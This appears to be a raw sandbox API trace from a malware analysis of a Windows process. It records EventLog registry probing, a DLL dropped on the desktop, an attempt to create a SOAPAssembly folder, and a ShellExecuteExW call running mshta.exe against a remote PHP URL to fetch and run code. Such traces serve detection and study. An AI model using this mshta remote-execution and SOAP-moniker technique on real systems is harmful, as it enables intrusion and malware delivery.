[0043.058] CoTaskMemFree (pv=0x0)
[0043.058] CoTaskMemAlloc (cb=0x204) returned 0x5ab8fc0
[0043.058] RegEnumKeyExW (in: hKey=0xa30, dwIndex=0x3, lpName=0x5ab8fc0, lpcchName=0x278088, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x278088, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0043.058] CoTaskMemFree (pv=0x5ab8fc0)
[0043.058] CoTaskMemFree (pv=0x0)
[0043.058] CoTaskMemAlloc (cb=0x204) returned 0x5ab8fc0
[0043.058] RegEnumKeyExW (in: hKey=0xa30, dwIndex=0x4, lpName=0x5ab8fc0, lpcchName=0x278088, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x278088, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0043.058] CoTaskMemFree (pv=0x5ab8fc0)
[0043.058] CoTaskMemFree (pv=0x0)
[0043.058] CoTaskMemAlloc (cb=0x204) returned 0x5ab8fc0
[0043.058] RegEnumKeyExW (in: hKey=0xa30, dwIndex=0x5, lpName=0x5ab8fc0, lpcchName=0x278088, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x278088, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0043.058] CoTaskMemFree (pv=0x5ab8fc0)
[0043.058] CoTaskMemFree (pv=0x0)
[0043.058] CoTaskMemAlloc (cb=0x204) returned 0x5ab8fc0
[0043.058] RegEnumKeyExW (in: hKey=0xa30, dwIndex=0x6, lpName=0x5ab8fc0, lpcchName=0x278088, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x278088, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0043.058] CoTaskMemFree (pv=0x5ab8fc0)
[0043.058] CoTaskMemFree (pv=0x0)
[0043.058] CoTaskMemAlloc (cb=0x204) returned 0x5ab8fc0
[0043.058] RegEnumKeyExW (in: hKey=0xa30, dwIndex=0x7, lpName=0x5ab8fc0, lpcchName=0x278088, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x278088, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0043.058] CoTaskMemFree (pv=0x5ab8fc0)
[0043.058] CoTaskMemFree (pv=0x0)
[0043.058] CoTaskMemAlloc (cb=0x204) returned 0x5ab8fc0
[0043.058] RegEnumKeyExW (in: hKey=0xa30, dwIndex=0x8, lpName=0x5ab8fc0, lpcchName=0x278088, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x278088, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0043.058] CoTaskMemFree (pv=0x5ab8fc0)
[0043.058] CoTaskMemFree (pv=0x0)
[0043.058] RegOpenKeyExW (in: hKey=0xa30, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x2780e8 | out: phkResult=0x2780e8*=0xa3c) returned 0x0
[0043.059] RegOpenKeyExW (in: hKey=0xa3c, lpSubKey="COM+ SOAP Services", ulOptions=0x0, samDesired=0x20019, phkResult=0x2780e8 | out: phkResult=0x2780e8*=0x0) returned 0x2
[0043.059] RegOpenKeyExW (in: hKey=0xa30, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x2780e8 | out: phkResult=0x2780e8*=0xa40) returned 0x0
[0043.059] RegOpenKeyExW (in: hKey=0xa40, lpSubKey="COM+ SOAP Services", ulOptions=0x0, samDesired=0x20019, phkResult=0x2780e8 | out: phkResult=0x2780e8*=0x0) returned 0x2
[0043.059] RegOpenKeyExW (in: hKey=0xa30, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x2780e8 | out: phkResult=0x2780e8*=0xa44) returned 0x0
[0043.059] RegOpenKeyExW (in: hKey=0xa44, lpSubKey="COM+ SOAP Services", ulOptions=0x0, samDesired=0x20019, phkResult=0x2780e8 | out: phkResult=0x2780e8*=0x0) returned 0x2
[0043.059] RegOpenKeyExW (in: hKey=0xa30, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x2780e8 | out: phkResult=0x2780e8*=0xa48) returned 0x0
[0043.059] RegOpenKeyExW (in: hKey=0xa48, lpSubKey="COM+ SOAP Services", ulOptions=0x0, samDesired=0x20019, phkResult=0x2780e8 | out: phkResult=0x2780e8*=0x0) returned 0x2
[0043.059] RegOpenKeyExW (in: hKey=0xa30, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x2780e8 | out: phkResult=0x2780e8*=0xa4c) returned 0x0
[0043.060] RegOpenKeyExW (in: hKey=0xa4c, lpSubKey="COM+ SOAP Services", ulOptions=0x0, samDesired=0x20019, phkResult=0x2780e8 | out: phkResult=0x2780e8*=0x0) returned 0x2
[0043.060] RegOpenKeyExW (in: hKey=0xa30, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x2780e8 | out: phkResult=0x2780e8*=0xa54) returned 0x0
[0043.060] RegOpenKeyExW (in: hKey=0xa54, lpSubKey="COM+ SOAP Services", ulOptions=0x0, samDesired=0x20019, phkResult=0x2780e8 | out: phkResult=0x2780e8*=0x0) returned 0x2
[0043.060] RegOpenKeyExW (in: hKey=0xa30, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x2780e8 | out: phkResult=0x2780e8*=0x0) returned 0x5
[0043.100] RegOpenKeyExW (in: hKey=0xa30, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2780e8 | out: phkResult=0x2780e8*=0xa58) returned 0x0
[0043.100] RegOpenKeyExW (in: hKey=0xa58, lpSubKey="COM+ SOAP Services", ulOptions=0x0, samDesired=0x20019, phkResult=0x2780e8 | out: phkResult=0x2780e8*=0x0) returned 0x2
[0043.101] RegOpenKeyExW (in: hKey=0xa30, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2780e8 | out: phkResult=0x2780e8*=0xa5c) returned 0x0
[0043.101] RegOpenKeyExW (in: hKey=0xa5c, lpSubKey="COM+ SOAP Services", ulOptions=0x0, samDesired=0x20019, phkResult=0x2780e8 | out: phkResult=0x2780e8*=0x0) returned 0x2
[0043.162] RegCloseKey (hKey=0xa30) returned 0x0
[0043.174] GetFullPathNameW (in: lpFileName="http100www4samyrai777m4p-host4in0t0tp4php2thread90.dll", nBufferLength=0x105, lpBuffer=0x27a550, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop\\http100www4samyrai777m4p-host4in0t0tp4php2thread90.dll", lpFilePart=0x0) returned 0x50
[0043.175] SetErrorMode (uMode=0x1) returned 0x8001
[0043.175] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop\\http100www4samyrai777m4p-host4in0t0tp4php2thread90.dll" (normalized: "c:\\users\\aetadzjz\\desktop\\http100www4samyrai777m4p-host4in0t0tp4php2thread90.dll"), fInfoLevelId=0x0, lpFileInformation=0x27a760 | out: lpFileInformation=0x27a760*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0043.175] SetErrorMode (uMode=0x8001) returned 0x1
[0043.310] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x7be4dc0
[0043.313] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x7be4cb0
[0043.319] GetCurrentThread () returned 0xfffffffffffffffe
[0043.320] OpenThreadToken (in: ThreadHandle=0xfffffffffffffffe, DesiredAccess=0x4, OpenAsSelf=1, TokenHandle=0x27a920 | out: TokenHandle=0x27a920*=0x0) returned 0
[0043.335] OpenThreadToken (in: ThreadHandle=0xfffffffffffffffe, DesiredAccess=0x4, OpenAsSelf=1, TokenHandle=0x27a978 | out: TokenHandle=0x27a978*=0x0) returned 0
[0043.414] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x27a768*=0xa78, lpdwindex=0x27a420 | out: lpdwindex=0x27a420) returned 0x0
[0062.272] GetFullPathNameW (in: lpFileName="http100www4samyrai777m4p-host4in0t0tp4php2thread90.dll", nBufferLength=0x105, lpBuffer=0x27a4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop\\http100www4samyrai777m4p-host4in0t0tp4php2thread90.dll", lpFilePart=0x0) returned 0x50
[0062.272] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop\\http100www4samyrai777m4p-host4in0t0tp4php2thread90.dll", nBufferLength=0x105, lpBuffer=0x27a380, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop\\http100www4samyrai777m4p-host4in0t0tp4php2thread90.dll", lpFilePart=0x0) returned 0x50
[0062.287] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x7bad770*=0x9fc, lpdwindex=0x279920 | out: lpdwindex=0x279920) returned 0x0
[0062.291] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop\\http100www4samyrai777m4p-host4in0t0tp4php2thread90.dll", nBufferLength=0x105, lpBuffer=0x278e90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop\\http100www4samyrai777m4p-host4in0t0tp4php2thread90.dll", lpFilePart=0x0) returned 0x50
[0062.291] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop\\http100www4samyrai777m4p-host4in0t0tp4php2thread90.dll", nBufferLength=0x105, lpBuffer=0x278dd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop\\http100www4samyrai777m4p-host4in0t0tp4php2thread90.dll", lpFilePart=0x0) returned 0x50
[0062.291] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\", nBufferLength=0x105, lpBuffer=0x278ce0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\root\\Office16\\", lpFilePart=0x0) returned 0x30
[0062.292] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\", nBufferLength=0x105, lpBuffer=0x278ed0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\root\\Office16\\", lpFilePart=0x0) returned 0x30
[0062.292] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\", nBufferLength=0x105, lpBuffer=0x278dd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\root\\Office16\\", lpFilePart=0x0) returned 0x30
[0062.609] CoCreateGuid (in: pguid=0x279968 | out: pguid=0x279968*(Data1=0xae96dc06, Data2=0x30e7, Data3=0x4711, Data4=([0]=0xa6, [1]=0x6c, [2]=0x41, [3]=0x43, [4]=0x52, [5]=0x3, [6]=0x70, [7]=0x90))) returned 0x0
[0062.612] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\config\\machine.config", nBufferLength=0x105, lpBuffer=0x2796a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\config\\machine.config", lpFilePart=0x0) returned 0x45
[0062.622] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\config\\machine.config", nBufferLength=0x105, lpBuffer=0x2796b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\config\\machine.config", lpFilePart=0x0) returned 0x45
[0062.622] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\config\\machine.config", nBufferLength=0x105, lpBuffer=0x279580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\config\\machine.config", lpFilePart=0x0) returned 0x45
[0062.676] CoCreateGuid (in: pguid=0x278d60 | out: pguid=0x278d60*(Data1=0xc9cc5cd8, Data2=0xabd7, Data3=0x47e5, Data4=([0]=0x97, [1]=0xb4, [2]=0x81, [3]=0xa0, [4]=0x98, [5]=0xc2, [6]=0xcb, [7]=0xfa))) returned 0x0
[0062.701] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x7d2c4c0
[0062.702] RtlMoveMemory (in: Destination=0x7d2c4c0, Source=0xa675ea0, Length=0x3c | out: Destination=0x7d2c4c0)
[0062.702] LocalAlloc (uFlags=0x0, uBytes=0x64) returned 0x7b444f0
[0062.702] RtlMoveMemory (in: Destination=0x7b444f0, Source=0xa676200, Length=0x64 | out: Destination=0x7b444f0)
[0062.706] ShellExecuteExW (in: pExecInfo=0xa676408*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="C:\\Windows\\System32\\mshta.exe", lpParameters="http://www.samyrai777m.p-host.in/t/t.php?thread=0", lpDirectory=0x0, nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0xa676408*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="C:\\Windows\\System32\\mshta.exe", lpParameters="http://www.samyrai777m.p-host.in/t/t.php?thread=0", lpDirectory=0x0, nShow=1, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0xbe8)) returned 1
[0062.808] LocalFree (hMem=0x7d2c4c0) returned 0x0
[0062.808] LocalFree (hMem=0x7b444f0) returned 0x0
[0062.857] SysStringByteLen (bstr="http://www.samyrai777m.p-host.in/t/tp.php?thread=0") returned 0x64
[0062.857] SysStringByteLen (bstr="http://www.samyrai777m.p-host.in/t/tp.php?thread=0") returned 0x64
[0062.857] SysStringByteLen (bstr="clientactivated") returned 0x1e
[0062.857] SysStringByteLen (bstr="clientactivated") returned 0x1e
[0062.857] CoTaskMemAlloc (cb=0x804) returned 0x79931e0
[0062.857] GetSystemDirectoryW (in: lpBuffer=0x79931e0, uSize=0x400 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
[0062.857] CoTaskMemFree (pv=0x79931e0)
[0062.857] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\com\\SOAPAssembly\\", nBufferLength=0x105, lpBuffer=0x27a450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\com\\SOAPAssembly\\", lpFilePart=0x0) returned 0x25
[0062.857] SetErrorMode (uMode=0x1) returned 0x8001
[0062.857] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\com\\SOAPAssembly\\" (normalized: "c:\\windows\\system32\\com\\soapassembly"), fInfoLevelId=0x0, lpFileInformation=0x27a660 | out: lpFileInformation=0x27a660*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0062.858] SetErrorMode (uMode=0x8001) returned 0x1
[0062.858] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\com\\SOAPAssembly\\", nBufferLength=0x105, lpBuffer=0x27a460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\com\\SOAPAssembly\\", lpFilePart=0x0) returned 0x25
[0062.858] SetErrorMode (uMode=0x1) returned 0x8001
[0062.858] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\com\\SOAPAssembly" (normalized: "c:\\windows\\system32\\com\\soapassembly"), fInfoLevelId=0x0, lpFileInformation=0x27a580 | out: lpFileInformation=0x27a580*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0062.859] SetErrorMode (uMode=0x8001) returned 0x1
[0062.859] SetErrorMode (uMode=0x1) returned 0x8001
[0062.859] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\com" (normalized: "c:\\windows\\system32\\com"), fInfoLevelId=0x0, lpFileInformation=0x27a580 | out: lpFileInformation=0x27a580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfece69ac, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1da26978, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1da26978, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
[0062.860] SetErrorMode (uMode=0x8001) returned 0x1
[0062.860] SetErrorMode (uMode=0x1) returned 0x8001
[0062.860] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x27a580 | out: lpFileInformation=0x27a580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb3c9890, ftCreationTime.dwHighDateTime=0x1d30211, ftLastAccessTime.dwLowDateTime=0x60dd8710, ftLastAccessTime.dwHighDateTime=0x1d30212, ftLastWriteTime.dwLowDateTime=0x60dd8710, ftLastWriteTime.dwHighDateTime=0x1d30212, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
[0062.860] SetErrorMode (uMode=0x8001) returned 0x1
[0062.860] SetErrorMode (uMode=0x1) returned 0x8001
[0062.860] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x27a580 | out: lpFileInformation=0x27a580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb3a3730, ftCreationTime.dwHighDateTime=0x1d30211, ftLastAccessTime.dwLowDateTime=0xde098210, ftLastAccessTime.dwHighDateTime=0x1d30614, ftLastWriteTime.dwLowDateTime=0xde098210, ftLastWriteTime.dwHighDateTime=0x1d30614, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
[0062.860] SetErrorMode (uMode=0x8001) returned 0x1
[0062.860] CreateDirectoryW (lpPathName="C:\\Windows\\system32\\com\\SOAPAssembly" (normalized: "c:\\windows\\system32\\com\\soapassembly"), lpSecurityAttributes=0x0) returned 0
[0062.872] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x278018 | out: phkResult=0x278018*=0xbd4) returned 0x0
[0062.888] RegQueryInfoKeyW (in: hKey=0xbd4, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x277f8c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x277f88, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x277f8c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x277f88*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0062.889] CoTaskMemFree (pv=0x0)
[0062.889] CoTaskMemAlloc (cb=0x204) returned 0x5ab7f40
[0062.889] RegEnumKeyExW (in: hKey=0xbd4, dwIndex=0x0, lpName=0x5ab7f40, lpcchName=0x278018, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x278018, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0062.890] CoTaskMemFree (pv=0x5ab7f40)
[0062.890] CoTaskMemFree (pv=0x0)
[0062.890] CoTaskMemAlloc (cb=0x204) returned 0x5ab7f40
[0062.890] RegEnumKeyExW (in: hKey=0xbd4, dwIndex=0x1, lpName=0x5ab7f40, lpcchName=0x278018, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x278018, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0062.890] CoTaskMemFree (pv=0x5ab7f40)
[0062.890] CoTaskMemFree (pv=0x0)
[0062.890] CoTaskMemAlloc (cb=0x204) returned 0x5ab7f40
[0062.890] RegEnumKeyExW (in: hKey=0xbd4, dwIndex=0x2, lpName=0x5ab7f40, lpcchName=0x278018, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x278018, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0062.890] CoTaskMemFree (pv=0x5ab7f40)
[0062.890] CoTaskMemFree (pv=0x0)
[0062.890] CoTaskMemAlloc (cb=0x204) returned 0x5ab7f40
[0062.890] RegEnumKeyExW (in: hKey=0xbd4, dwIndex=0x3, lpName=0x5ab7f40, lpcchName=0x278018, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x278018, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0062.890] CoTaskMemFree (pv=0x5ab7f40)
[0062.890] CoTaskMemFree (pv=0x0)
[0062.890] CoTaskMemAlloc (cb=0x204) returned 0x5ab7f40
[0062.890] RegEnumKeyExW (in: hKey=0xbd4, dwIndex=0x4, lpName=0x5ab7f40, lpcchName=0x278018, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x278018, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0062.890] CoTaskMemFree (pv=0x5ab7f40)
[0062.890] CoTaskMemFree (pv=0x0)
[0062.890] CoTaskMemAlloc (cb=0x204) returned 0x5ab7f40
[0062.890] RegEnumKeyExW (in: hKey=0xbd4, dwIndex=0x5, lpName=0x5ab7f40, lpcchName=0x278018, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x278018, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0062.890] CoTaskMemFree (pv=0x5ab7f40)
[0062.890] CoTaskMemFree (pv=0x0)
[0062.890] CoTaskMemAlloc (cb=0x204) returned 0x5ab7f40
[0062.890] RegEnumKeyExW (in: hKey=0xbd4, dwIndex=0x6, lpName=0x5ab7f40, lpcchName=0x278018, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x278018, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0062.890] CoTaskMemFree (pv=0x5ab7f40)
[0062.890] CoTaskMemFree (pv=0x0)
[0062.890] CoTaskMemAlloc (cb=0x204) returned 0x5ab7f40
[0062.890] RegEnumKeyExW (in: hKey=0xbd4, dwIndex=0x7, lpName=0x5ab7f40, lpcchName=0x278018, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x278018, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0062.891] CoTaskMemFree (pv=0x5ab7f40)
[0062.891] CoTaskMemFree (pv=0x0)
[0062.891] CoTaskMemAlloc (cb=0x204) returned 0x5ab7f40
[0062.891] RegEnumKeyExW (in: hKey=0xbd4, dwIndex=0x8, lpName=0x5ab7f40, lpcchName=0x278018, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x278018, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0062.891] CoTaskMemFree (pv=0x5ab7f40)
[0062.891] CoTaskMemFree (pv=0x0)
[0062.891] RegOpenKeyExW (in: hKey=0xbd4, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x278078 | out: phkResult=0x278078*=0xbdc) returned 0x0
[0062.891] RegOpenKeyExW (in: hKey=0xbdc, lpSubKey="COM+ SOAP Services", ulOptions=0x0, samDesired=0x20019, phkResult=0x278078 | out: phkResult=0x278078*=0x0) returned 0x2
[0062.891] RegOpenKeyExW (in: hKey=0xbd4, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x278078 | out: phkResult=0x278078*=0xbe0) returned 0x0
[0062.891] RegOpenKeyExW (in: hKey=0xbe0, lpSubKey="COM+ SOAP Services", ulOptions=0x0, samDesired=0x20019, phkResult=0x278078 | out: phkResult=0x278078*=0x0) returned 0x2
[0062.891] RegOpenKeyExW (in: hKey=0xbd4, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x278078 | out: phkResult=0x278078*=0xbf4) returned 0x0
[0062.891] RegOpenKeyExW (in: hKey=0xbf4, lpSubKey="COM+ SOAP Services", ulOptions=0x0, samDesired=0x20019, phkResult=0x278078 | out: phkResult=0x278078*=0x0) returned 0x2
[0062.891] RegOpenKeyExW (in: hKey=0xbd4, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x278078 | out: phkResult=0x278078*=0xbcc) returned 0x0
[0062.892] RegOpenKeyExW (in: hKey=0xbcc, lpSubKey="COM+ SOAP Services", ulOptions=0x0, samDesired=0x20019, phkResult=0x278078 | out: phkResult=0x278078*=0x0) returned 0x2
[0062.892] RegOpenKeyExW (in: hKey=0xbd4, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x278078 | out: phkResult=0x278078*=0xbfc) returned 0x0
[0062.892] RegOpenKeyExW (in: hKey=0xbfc, lpSubKey="COM+ SOAP Services", ulOptions=0x0, samDesired=0x20019, phkResult=0x278078 | out: phkResult=0x278078*=0x0) returned 0x2
[0062.892] RegOpenKeyExW (in: hKey=0xbd4, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x278078 | out: phkResult=0x278078*=0xc08) returned 0x0
[0062.892] RegOpenKeyExW (in: hKey=0xc08, lpSubKey="COM+ SOAP Services", ulOptions=0x0, samDesired=0x20019, phkResult=0x278078 | out: phkResult=0x278078*=0x0) returned 0x2
[0062.892] RegOpenKeyExW (in: hKey=0xbd4, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x278078 | out: phkResult=0x278078*=0x0) returned 0x5
[0062.899] RegOpenKeyExW (in: hKey=0xbd4, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x278078 | out: phkResult=0x278078*=0xc0c) returned 0x0
[0062.900] RegOpenKeyExW (in: hKey=0xc0c, lpSubKey="COM+ SOAP Services", ulOptions=0x0, samDesired=0x20019, phkResult=0x278078 | out: phkResult=0x278078*=0x0) returned 0x2
[0062.901] RegOpenKeyExW (in: hKey=0xbd4, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x278078 | out: phkResult=0x278078*=0xc10) returned 0x0
[0062.901] RegOpenKeyExW (in: hKey=0xc10, lpSubKey="COM+ SOAP Services", ulOptions=0x0, samDesired=0x20019, phkResult=0x278078 | out: phkResult=0x278078*=0x0) returned 0x2
[0062.905] RegCloseKey (hKey=0xbd4) returned 0x0
[0062.907] GetFullPathNameW (in: lpFileName="http100www4samyrai777m4p-host4in0t0tp4php2thread90.dll", nBufferLength=0x105, lpBuffer=0x27a4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop\\http100www4samyrai777m4p-host4in0t0tp4php2thread90.dll", lpFilePart=0x0) returned 0x50
[0062.907] SetErrorMode (uMode=0x1) returned 0x8001
[0062.907] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop\\http100www4samyrai777m4p-host4in0t0tp4php2thread90.dll" (normalized: "c:\\users\\aetadzjz\\desktop\\http100www4samyrai777m4p-host4in0t0tp4php2thread90.dll"), fInfoLevelId=0x0, lpFileInformation=0x27a6f0 | out: lpFileInformation=0x27a6f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd5210210, ftCreationTime.dwHighDateTime=0x1d34cee, ftLastAccessTime.dwLowDateTime=0xd5210210, ftLastAccessTime.dwHighDateTime=0x1d34cee, ftLastWriteTime.dwLowDateTime=0xd5210210, ftLastWriteTime.dwHighDateTime=0x1d34cee, nFileSizeHigh=0x0, nFileSizeLow=0x1200)) returned 1
[0062.907] SetErrorMode (uMode=0x8001) returned 0x1
